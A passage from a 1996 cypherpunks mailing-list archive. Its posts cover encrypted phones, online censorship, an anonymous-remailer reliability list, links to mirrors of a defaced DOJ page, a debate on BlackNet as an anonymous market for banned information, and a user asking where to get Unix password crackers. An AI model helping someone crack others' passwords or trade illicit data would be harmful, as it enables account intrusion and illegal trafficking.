>             CS8191 Triple-DES Telephone Privacy Device
> [...]
> Specifications:
> 
>  Modem
> 
>  * ITU V.32bis (14,400 bits/sec)
> 
>  * International standard GSM 06.10 full rate speech transcoding 
>    (13,000 bits/sec)
> 
> 
> Cryptographic Details:
> 
> * Unique session key generated for each conversation using Diffie-Hellman
>   exponential key exchange (2048 bit modulus) (U.S. Patent No. 4,200,770
>   licensed by Cylink Corporation)
> 
> * Defense against "man in the middle" active attack using interleave
>   protocol combined with voice verification of six digit key name derived
>   from the public exponentials
>
> * Hardware Random number generator based on Johnson noise
> 
> * Three Key Triple-DES (168 bit key), operating in modified counter mode.

To anyone who's read the PGPfone docs, this sounds very similar,
PGPfone uses 3DES (as one option: also CAST, Blowfish), but it's a 2
key 3DES rather than 3 key (I think).  PGPfone works with
9600/14400/28800 modems, uses Diffie Hellman key exchange, uses a
commitment to exchanges by passing the hashes of the exchanges prior
to traditional dh key-exchange (we'll see if this compares to what is
described here as an `interleave protocol').  PGPfone offers several
GSM codecs.

Do you see any barrier to PGPfone being able to interoperate with your
product once your specs are published?  (Aside from a fast PC/MAC to
keep up -- 3DES is the most computationaly expensive encryption
algorithm used by PGPfone).

Also I believe I read somewhere in your announce that upgrades are
possible -- can these happen in software only?  Flash BIOS upgrade?
If it is software upgradable are you releasing the programming specs
also?

A very nice product, sure beats the hell out of clipper based phones,
and the various snake oil offerings,

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 19 Aug 1996 22:51:33 +0800
To: Brendon Macaraeg <brendon@home.net>
Subject: Re: proxy servers in Singapore
In-Reply-To: <1.5.4.32.19960817031055.006c95e4@poptart.home.net>
Message-ID: <Pine.SUN.3.91.960819050928.6457G-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 16 Aug 1996, Brendon Macaraeg wrote:

> Did anyone else catch the AP wire story
> (it ran here in the SF Chronicle on Thursday)
> about the Singapore government cracking
> down on "undesirable" (e.g., sex smut, anti-govt.
> postings etc.) content on web sites, usenet etc.
> Their basically forcing, by law, Singapore  ISPs to use
> proxy servers that contain the information
> that the govt. deems fit. 

Yep, I have that and other Singapore stuff at:
  http://www.eff.org/~declan/global/

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 19 Aug 1996 23:41:28 +0800
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <199608190146.SAA19133@fat.doobie.com>
Message-ID: <Pine.SUN.3.91.960819053428.6457M-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Aug 1996, Huge Cajones Remailer wrote:
> 
> Did anyone save a copy of the altered web page?  I would like to see
> what the crackers did.

Check out the attached message. If anyone has any info, I'd love to hear 
more.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


>---------- Forwarded message ----------
>Date: Sat, 17 Aug 1996 00:50:51 -0700
>From: v0!d <voidmstr@PRIMENET.COM>
>To: Multiple recipients of list VOXERS-AT-LARGE <VOXERS-AT-LARGE@USA.NET>
>Subject: Re: quick! b4 it's gone DOJ WWW Page hacked
>
>At 10:59 PM -0700 8/16/96, voidmstr wrote:
>>http://www.usdoj.gov/
>
>
>gone, but not forgotten!
>
>check these mirrors from alert VAL ppl:
>
>http://www.doobie.com/~baby-x/usdoj/
>
>http://spam.ppp0.dorsai.org/dojhack/
>
>i have at the source and files (mac format) @
>
>http://www.primenet.com/~voidmstr/usdojhack.sit.bin
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 20 Aug 1996 01:02:51 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199608191350.GAA20209@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 19 Aug 96 6:47:01 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
balls    remailer@huge.cajones.com         *++********     3:33 100.00%
penet    anon@anon.penet.fi               .--..--...-  19:43:48  99.81%
nemesis  remailer@meaning.com              ***********    23:25  99.71%
jam      remailer@cypherpunks.ca          -***********  1:42:22  99.70%
winsock  winsock@c2.org                   -__----..--  10:02:35  99.67%
replay   remailer@replay.com              ***+********     4:30  99.51%
amnesia  amnesia@chardos.connix.com       ---  ------   3:51:56  98.85%
nymrod   nymrod@nym.jpunix.com            ###-+ #         21:25  97.41%
extropia remail@miron.vip.best.com        ----------    6:30:40  95.67%
mix      mixmaster@remail.obscura.com     -+---+++-++   1:35:16  92.72%
lead     mix@zifi.genetics.utah.edu       +--+++++  ++  1:01:56  86.82%
haystack haystack@holy.cow.net            --##**#* -      19:17  85.11%
ncognito ncognito@rigel.cyberpass.net     --+           7:57:35  15.59%
alpha    alias@alpha.c2.org               .             5:24:22   7.71%
lucifer  lucifer@dhp.com                  +               53:57   7.27%
c2       remail@c2.org                    .             5:59:32   6.81%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 20 Aug 1996 01:35:11 +0800
To: cypherpunks@toad.com
Subject: Re: Why BlackNet *IS* a Data Haven
In-Reply-To: <v02140b00ae3dd1760748@[204.179.131.64]>
Message-ID: <199608191403.HAA25315@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


mccoy@communities.com (Jim McCoy) writes:
>Your descriptions of BlackNet as a data haven seem to be completely
>based upon the presumption that an anonymous contact service and contract
>exchange is the functional equivalent to a data haven.  Here are a few
>reasons why I would disagree:

I think part of the confusion here is the name "BlackNet".  As I envision
the concept, BlackNet is not really an anonymous contact service, or in
fact a network of any sort.  Rather, it is a vendor.  It buys and sells
information.  The name, while provocative, is a bit misleading in this
regard.  (This is just my model, and may not actually correspond with
Tim's or anyone else's idea.  But I think it more closely matches the
data haven concept, and in fact is more consistent with the original
announcement.)

BlackNet has a public key, and a known virtual location in the form of
certain newsgroups that it monitors.  Anyone can initiate a
communication interchange with BlackNet by posting a message to those
groups, encrypted with BlackNet's key.  Presumably in that message will
be included return address information in the form of a key and a set of
locations that will be monitored for replies.  In this way ongoing
conversations can be maintained between BlackNet and customers who are
either buying or selling to it.

BlackNet would not be used (as I see it) for direct communication
between buyers and sellers of information.  How would the BlackNet
public key fit into this model?  The existence of a specific BlackNet
public key is part of what drives me to picture it as a vendor.
Rather, BlackNet will buy information (plus unrestricted rights to
disseminate that information), add it to its catalog, and then
advertise its availability and price.

>As a publisher of "naughty bits" I do not have the ability to just toss
>data up and assume that it will be there when someone wants it.  I am forced
>to continuously monitor the appropriate newsgroups to find messages from
>people asking me to post the blueprints to the orbital mind control lasers
>or kiddie porn.  I cannot put my data onto "the Net" with an expectation
>that any arbitrary user will be able to get the bits one month later.  To
>maintain persistence I need to constantly repost my data, making it easier
>for authorities to trace me through simple taffic analysis if nothing else.

This model pictures BlackNet differently than I do.  As I see it, once
you sell your data to BlackNet you don't have to take any more steps.
There may still be problems, in that you may feel that BlackNet is
setting too high a price on the data you want to distribute.  However of
course anyone is free to start up a competing service, if they want to
take the risks.  BlackNet fees will in the long run be determined by
competitive market conditions based on the costs of maintaining
anonymity.

>[Quoting Tim May:]
>> A person in the U.S. seeking the Necronomicon posts a message to BlackNet
>> (or any similar forum, using the same methods) asking for a copy of it, or
>> offering to pay for it. (Whether the information is free or for a fee is
>> not central to the idea.) This request is, of course, untraceable.
>>
>> Anyone, anywhere in the world, with a copy of this banned material on his
>> or her private machines may see this request and respond, either giving the
>> material away, or negotiating a fee. (As I said before, the absence of a
>> robust digital cash system, bidirectionally untraceable, is a known
>> limitation of all such systems.)

This is a little different from my picture of BlackNet, as I wrote above.
I would see BlackNet as being a particular seller of information, who
will respond to this message.  It could have competitors like SafeHaven,
StrongHold, InfoBase, etc., each of which will offer data for a price,
and each of which will have its own reputation for reliability.

>Now you reveal the objection I had to BlackNet being a data haven.  What if
>only one person has a copy of this banned material?  It may not be in this
>publishers interest to have the data available to anyone for posting in
>response to the query ("Information does not want to be free, it wants to
>be expensive and liberated...") and some data is not widespread enough or of
>interest to enough people to assume that multiple copies exist to those who
>read BlackNet postings. Therefore the only way for a publisher to maintain
>availability of their data is to constantly monitor the appropriate newsgroups
>and republish for each request, persistence is maintained only through
>eternal vigilence (much like liberty, only requiring a lot more effort :)

Here is where BlackNet as an information middleman makes the most sense.
Its business model includes the costs of this sort of vigilance, which
after all can be automated.

>> It's a data haven.

>No, it is an anonymous contact service.  To claim this is a data haven is
>like claiming that the classified ads in a newspaper are the equivalent to
>a mall; you could probably find the same goods if you looked long enough, but
>there is a reason that manufacturers sell goods through stores rather than
>just posting classified ads across the country.  When one does not have the
>time to check the classified ads, wants to goods from a reputable source, and
>wants the goods in a timely fashion they will go to a shopping center.

Actually we now have "virtual malls" online.  These are in their infancy
but eventually they could become as easy to use and reliable as regular
malls (for appropriate kinds of goods).  All that BlackNet (as I picture
it) lacks is a WWW interface, and even that could be provided if the
gateway server could be made immune to legal pressure and if various
technicalities about anonymous WWW connections could be dealt with.

As for reputations, if BlackNet is one of several vendors of
information, like its competitors, they can all develop reputations of
their own for reliability, honesty, availability, etc.  There may be
problems if the testimonials of customers are all anonymous, but in
some cases such methods as signed transcripts of information exchanges
can be used by one side or the other to justify claims that the other
side has cheated.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 20 Aug 1996 01:39:07 +0800
To: cypherpunks@toad.com
Subject: Indonesia detains democracy activist after post to mailing list
Message-ID: <Pine.SUN.3.91.960819070454.9452B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain






---------- Forwarded message ----------
Date: Sun, 18 Aug 1996 21:23:29 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Indonesia detains democracy activist after post to mailing list

Indonesia is joining the rest of the world in cracking down on online
speech. Perhaps the lesson here is that no matter how much the Internet
supposedly "routes around censorship," the most vulnerable points are the
humans on both ends. More info on the global net-crackdown is at: 
  http://www.eff.org/~declan/global/

-Declan

---

http://www.hotwired.com/netizen/96/34/special0a.html

   HotWired, The Netizen
   19 August 1996

   Trouble in Paradise
   by Declan McCullagh (declan@well.com)
   Washington, DC, 18 August
   
   Indonesian democracy activists have taken their fight for freedom
   to the Net, and the government doesn't approve.
   
   After distributing email messages about riots in Jakarta last month to
   an international Indonesian-politics mailing list, Prihadi Beny
   Waluyo, a lecturer at Duta Wacana Christian University, was arrested
   and interrogated by the military. Since then, the mailing list has
   been banned from the country and Waluyo has returned to his house,
   where he remains under surveillance.
   
   Until now, Indonesian cyberspace has been relatively free, with no
   regulations or laws explicitly restricting online discussions. By
   contrast, newspapers and magazines are subject to strict censorship,
   following a 1984 ministerial decree requiring the press to obtain
   licenses from the government.

[...]
   
   "He [Waluyo] was arrested and accused of sending messages to Holland
   and printing out photocopies," said Sidney Jones, executive director
   of Human Rights Watch/Asia. "The army is out to stop any kind of
   discussion of the riots."
   
   The censor-happy regime of President Suharto tried to stop journalists
   from reporting on the outbreaks of violence - which shattered his
   carefully cultivated image of a stable Indonesia. The worst domestic
   disturbance in a decade, the uprising started after police stormed the
   headquarters of an opposition party and ejected anti-government
   activists from the building...
   
[...]

---

August 14, 1996

His Excellency M. Arifin Siregar
Ambassador to the United States
Embassy of Indonesia
2020 Mass. Avenue, NW
Washington, DC  20036

Your Excellency:

     I am writing on behalf of Human Rights Watch/Asia to protest the
arrest of Drs. Prihadi Beny Waluyo, a lecturer at Duta Wacana Christian
University. Drs. Waluyo was arrested at his home by soldiers of the
district military command. He was reportedly accused of distributing
e-mail messages and also of sending messages relating to the July 27 riots
to a destination in Holland. His arrest came after an unidentified person
gave an officer photocopies of e-mail messages that were traced to Drs.
Waluyo. The person claimed the printouts came from a store in Kebumen, a
district of Yogyakarta. 

     Following his arrest, Drs. Waluyo was interrogated by the military
about his connections with the Peoples Democratic Party (PRD), which the
government has accused of masterminding the riots, but he denied any
involvement with the PRD. He acknowledged that he had sent messages over
the Internet. Following his questioning, he was reportedly ordered to go
to his home and was told to report to the district military command on a
regular basis. He is said to be under strict surveillance. 

     Human Rights Watch opposes actions by the Indonesian government to
restrict electronic communication. As stated in Article 19 of the
Universal Declaration of Human Rights: 

     Everyone has the right to freedom of opinion and expression: this     
     right includes freedom to hold opinions without interference and to
     seek, receive and impart information and ideas through any media and
     regardless of frontiers.

We believe that such forums provide a truly unique opportunity for people
from around the globe to share their views with an international audience.
By allowing unrestricted communication, important issues can receive the
benefit of serious discussion by the broadest cross-section of society. If
the Internet is to achieve its potential to become a global information
infrastructure, it is important, at the present moment, to agree to allow
its unrestricted development. 

     We urge that Drs. Waluyi and every other citizen be allowed to
receive and transmit electronic mail without fear of harassment,
intimidation, or arrest. 

Sincerely,
Sidney Jones
Executive Director
Human Rights Watch/Asia
                              
cc:  His Excellency Nugroho Wisnumurti, Ambassador to the United Nations 

---

[Thanks to Bruce Sterling for this excerpt. --Declan]
 
>From the INDEX ON CENSORSHIP web site:
 
http://www.oneworld.org/index_oc/
  
INDONESIA
 
 It was reported in May that the government has banned the book Bayang Bayang
 PKI (In the Shadows of the PKI). Published by the Institute for Studies on
 the Free Flow of Information (ISAI), it focuses on the 1965-1966 events
 leading to the assumption of power by President Soeharto. It is now a
 criminal offence for any person to process, publish, distribute, trade or
 reprint the book. (A19)
 
 The government has put pressure on the media to report positively on
 government-backed efforts to oust the leader of the opposition Indonesian
 Democratic Party (PDI), Megawati Sukarno-putri. On 2 June army officers
 invited most of Indonesia's chief editors to attend media briefings where,
 among other things, they were told not to use the words 'unseat' or 'topple'
 in their reporting.
 
 A rally in Jakarta organised by members loyal to Megawati on 20 June was
 broken up by troops, who killed at least one of the protesters, and arrested
 hundreds. Erwin Hadi, photographer with the weekly Sinar, Iqbal Wahyudin of
 CNN, Tomohiko Ohtsuka of Mainichi Shimbun and Reuters photographer Enny
 Nuraheini were among the journalists injured by soldiers during the rally.
 
 Local stations were also banned by the government from broadcasting images
 of the protest or from helping foreign news agencies feed their pictures of
 the rally abroad. Megawati was finally ousted as PDI leader on 22 June.
 (Institute for Studies on the Free Flow of Information)
 
 The Supreme Court voted on 13 June to uphold the government's ban on the
 independent newsweekly Tempo (Index 4&5/1994, 3/1995, 1/1996). The Court
 ruled that the information minister has the right to revoke publishing
 licences since he also has the right to issue them. (Institute for Studies
 on the Free Flow of Information)
 
 Index Index incorporates information from the American Association for the
 Advancement of
 Science Human Rights Action Network (AAASHRAN), Amnesty International (AI),
 Article 19
 (A19), the BBC Monitoring Service Summary of World Broadcasts (SWB), the
 Committee to
 Protect Journalists (CPJ), the Canadian Committee to Protect Journalists
 (CCPJ), the
 Inter-American Press Association (IAPA), the International Federation of
 Journalists (IFJ/FIP), the
 International Federation of Newspaper Publishers (FIEJ), Human Rights Watch
 (HRW), the Media
 Institute of Southern Africa (MISA), International PEN (PEN), Open Media
 Research Institute
 (OMRI), Reporters Sans Frontires (RSF), the World Association of Community
 Broadcasters
 (AMARC) and other sources

###







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 19 Aug 1996 23:47:44 +0800
To: WinSock Remailer <winsock@c2.org>
Subject: Discordians a-gogo (aggoo)
In-Reply-To: <199608190658.XAA16050@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.960819085811.6502B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Aug 1996, WinSock Remailer wrote:
> 
>           DISCORDIAN SOCIETY SUPER SECRET CRYPTOGRAPHIC CYPHER CODE

BTW, have you ever looked really closely at a Terisa systems business 
card. Really closely? HAve you seen the Fnord?

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: couto@oim.uem.mz
Date: Mon, 19 Aug 1996 19:06:18 +0800
To: cypherpunks@toad.com
Subject: Re: Unix passwd-cracker online?
Message-ID: <322337ec.oim@oim.uem.mz>
MIME-Version: 1.0
Content-Type: text/plain



Hi Arnauld!

Where can I get this file???
Is there a new version of Cracker Jack than 1.4?
There is a whay of puting Cracker Jack to manage passwords bigger 
than 8 characters?

Thanx in advance,

cRaZy bYtE
couto@oim.uem.mz

On 17 Aug 96 at 22:53, Arnauld Dravet wrote:

> Date sent:      Sat, 17 Aug 1996 22:53:51 -0500
> From:           Arnauld Dravet <scraver@mnet.fr>
> To:             cypherpunks@toad.com
> Subject:        Re: Unix passwd-cracker online?

> there's a new cracker under dos called John the Cracker, and coded by
> UCF96. It's optimized for Pentiumsand is better than cracker jack on a
> lot of points : can work with or without wordlists, and u can modify all
> what u want....approx 30% faster than cracker jack on a pentium (i run
> it at usually 4000 cps on a P90/32Mb ram and a 25Mb wordlist (yeah it's
> big))
> 
> scraver@mnet.fr
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 04:47:11 +0800
To: cypherpunks@toad.com
Subject: Re:Why BlackNet *IS* a Data Haven
Message-ID: <ae3de0b20e021004af28@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:28 AM 8/19/96, Jim McCoy wrote:
>Tim May writes:
>> Without splitting too many semantic hairs about the precise definition of
>> "data haven," let me examine some ways in which BlackNet behaves
>> identically to a conventional data haven.
>
>I would be willing to concede the point if you would take a few seconds
>to examine the issue of complete lack of persistence in BlackNet.

There are various amounts of persistence, depending on which kind of "pool"
is used:


* Usenet newsgroups have a persistence of days to weeks, depending on one's
particular site. This is enough for parties to find each other _if_ they
are watching (or having agents watching). And of course Usenet archives are
expected--Alta Vista and Deja News has Usenet articles going back several
months in many cases.

* Mailing list message pools (a la Cuperman) have an effectively infinite
persistence, if parties archive the messages.

* Web-based message pools, which to my knowledge have not been used yet,
would have a persistence as long as the messages are archived...which could
be very long.

Rather than _persistence_, I'd say _access time_ or _latency_ is a more
serious criticism of my approach. In contrast to a large library or
bookstore, with access times of ~minutes, the access times for material on
BlackNet may be ~days to ~weeks. Or, of course, "never."

>Your descriptions of BlackNet as a data haven seem to be completely
>based upon the presumption that an anonymous contact service and contract
>exchange is the functional equivalent to a data haven.  Here are a few
>reasons why I would disagree:
>
>As a publisher of "naughty bits" I do not have the ability to just toss
>data up and assume that it will be there when someone wants it.  I am forced
>to continuously monitor the appropriate newsgroups to find messages from
>people asking me to post the blueprints to the orbital mind control lasers
>or kiddie porn.  I cannot put my data onto "the Net" with an expectation
>that any arbitrary user will be able to get the bits one month later.  To
>maintain persistence I need to constantly repost my data, making it easier
>for authorities to trace me through simple taffic analysis if nothing else.

I grant that my version is not like a "Mega-Barnes-and-Noble" bookstore,
with vast amounts of stuff available for browsing. It is more like a
"stacks"-based library. (Many universities have lesser-used books,
sometimes _all_ books, in "stacks," accessible only by qualified
librarians, or by permission.)

>> The classical data haven is closely identified with "place." To many
>> people, they naturally assume "data haven" = a haven for data, a "harbor"
>> (same IE root as haven) = a physical place.
>>
>> But is "place" important?
>
>No one has really claimed place is important, in fact the ideal data haven
>has no physical existence whatsoever.  This is a given.  As a practical
>matter it is a lot easier if you start off in a "place" because there are
>fewer complications but this has never been a necessity.

Some have focussed on "place," by focussing on ideas like offshore buoys,
orbiting broadcasters, and, of course, on finding accomodating
jurisdictions that will tolerate data havens in their midst.

You and I may agree that data havens need to be virtual. I'm just proposing
an architecture--and certainly not the final version!--that actually works.
Others can suggest their own alternatives, or build on versions that are
out there.

>> A person in the U.S. seeking the Necronomicon posts a message to BlackNet
>> (or any similar forum, using the same methods) asking for a copy of it, or
>> offering to pay for it. (Whether the information is free or for a fee is
>> not central to the idea.) This request is, of course, untraceable.
>>
>> Anyone, anywhere in the world, with a copy of this banned material on his
>> or her private machines may see this request and respond, either giving the
>> material away, or negotiating a fee. (As I said before, the absence of a
>> robust digital cash system, bidirectionally untraceable, is a known
>> limitation of all such systems.)
>
>Now you reveal the objection I had to BlackNet being a data haven.  What if
>only one person has a copy of this banned material?  It may not be in this
>publishers interest to have the data available to anyone for posting in
>response to the query ("Information does not want to be free, it wants to
>be expensive and liberated...") and some data is not widespread enough or of
>interest to enough people to assume that multiple copies exist to those who
>read BlackNet postings. Therefore the only way for a publisher to maintain
>availability of their data is to constantly monitor the appropriate newsgroups
>and republish for each request, persistence is maintained only through
>eternal vigilence (much like liberty, only requiring a lot more effort :)

What if only one person has a copy? Nothing in *my* concept of data haven
says anything about information being free, or cheap, or widely available.
Books aren't usually free, of course, so why should information be free

The issue of what happens if someone buys an item and then republishes or
redistributes it is, of course, orthogonal to the discussion here. It's a
tough problem, and the basis of the "information wants to be free"
aphorism. But not a key issue for differentiating forms of data havens, as
I see things.

>> It's a data haven.
>
>No, it is an anonymous contact service.  To claim this is a data haven is
>like claiming that the classified ads in a newspaper are the equivalent to
>a mall; you could probably find the same goods if you looked long enough, but
>there is a reason that manufacturers sell goods through stores rather than
>just posting classified ads across the country.  When one does not have the
>time to check the classified ads, wants to goods from a reputable source, and
>wants the goods in a timely fashion they will go to a shopping center.

I agree with the "classified ads vs. shopping mall" distinction. In fact,
it neatly summarizes the latency/availability issues. So be it.

Until the "shopping mall" exists, I'll settle for the "classified ads." If
BlackNet and similar systems function adequately as an anonymous classified
ad system, this will be an improvement over what exists now, which is, of
course, "nothing."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Mon, 19 Aug 1996 18:06:23 +0800
To: C Matthew Curtin <cmcurtin@research.megasoft.com>
Subject: Re: THE POUCH
In-Reply-To: <199608181757.NAA10242@goffette.research.megasoft.com>
Message-ID: <Pine.GSO.3.95.960819093205.27171F-100000@admin.is.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi

>> "The POUCH is a secure e-mail terminal program for IBM compatible
>> computers. It uses a secret key phrase, advanced cryptographic
>> techniques and several UNPUBLISHED ALGORITHMS to protect data in the
>> body of e-mail messages. The key phrase, which can be up to 48 bytes
>> long, is easily remembered and communicated. The POUCH is highly
>> resistant to all known forms of cryptographic attack." [emphasis mine]

The INSTANT one see's the words "unpublished algorithms" appear in the
context of cryptography one knows that snake oil is being purveyed.
Resistant to all known forms of cryptographic attack?? Words fail me.

> Making the algorithm proprietary
> does extremely little in making it resistant to attack. All of your
> statements regarding the security of "The Pouch" are worthless, for
> you have no data with which to substantiate your claims.

Absolutely.

> If it is any good, there's no way for us to know. But your marketing
> of the product has every indication that it's nothing more than smoke
> and mirrors. To coin a phrase, "pseudocrypto."
> Please refrain from your bogus marketing techniques. This kind of
> stuff, by claiming to be "real cryptography" makes real cryptographers
> look bad.

Quite right. I'm not a "real cryptographer" myself, however I do feel that
many people on this list subscribe to a similar set of values and are
equally angered by people who sell snake oil to unsuspecting people.

Later
Mike







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Aug 1996 04:23:31 +0800
To: cypherpunks@toad.com
Subject: Re: Billy boy's satellites [Was - Floating DataHaven]
Message-ID: <ae3de8c50f02100494d9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:16 AM 8/19/96, Vipul Ved Prakash wrote:
>>
>> Vincent Cate wrote:

>> Doesn't the low orbit part mean that the satellites will have a low life
>> expectancy, meaning a new launch every couple of days? (where's Gerald
>> Bull when you need him - oh yes, now I remember ...)

LEO (Low Earth Orbit) is only relative to the main alternative placement
for broadcast satellites: geostationary orbit, out in the Clarke Belt. LEO
satellites are well above significant drag of the troposphere and are
expected to remain in orbit far longer than their lifetimes as useful
transponders.

>The Iridium Project was pretty neat in this respect. I don't know what
>is happenning with it as of now. It had some 230+ satellites, and some
>smart routing techniques, if a satellite goes down.

Actually, far fewer. The original number of satellites (not counting
spares) was equal to the atomic number of iridium, hence the name (though
maybe they altered the number of satellites to match the atomic number?).
They later reduced the needed number by a few, but kept the name.

An Alta Vista search on "iridium AND satellite" produces 1000 hits, so
there's plent of information out there.

There are also two major competing systems, also not yet deployed. One is
the Microsoft-McCaw Cellular project, another is being done by an aerospace
company working with Qualcomm, or a subsidiary. Again, the Web should
produce the information for anyone interested.

Which of the three (and maybe more) systems will actually get deployed, and
which will succeed in the market, is an interesting question.

There's some obvious crypto/GAK/New World Order issues: many countries may
not care for a communications system which allows citizen-units or enemy
agents to make phone calls from the middle of the Kalahari desert or from
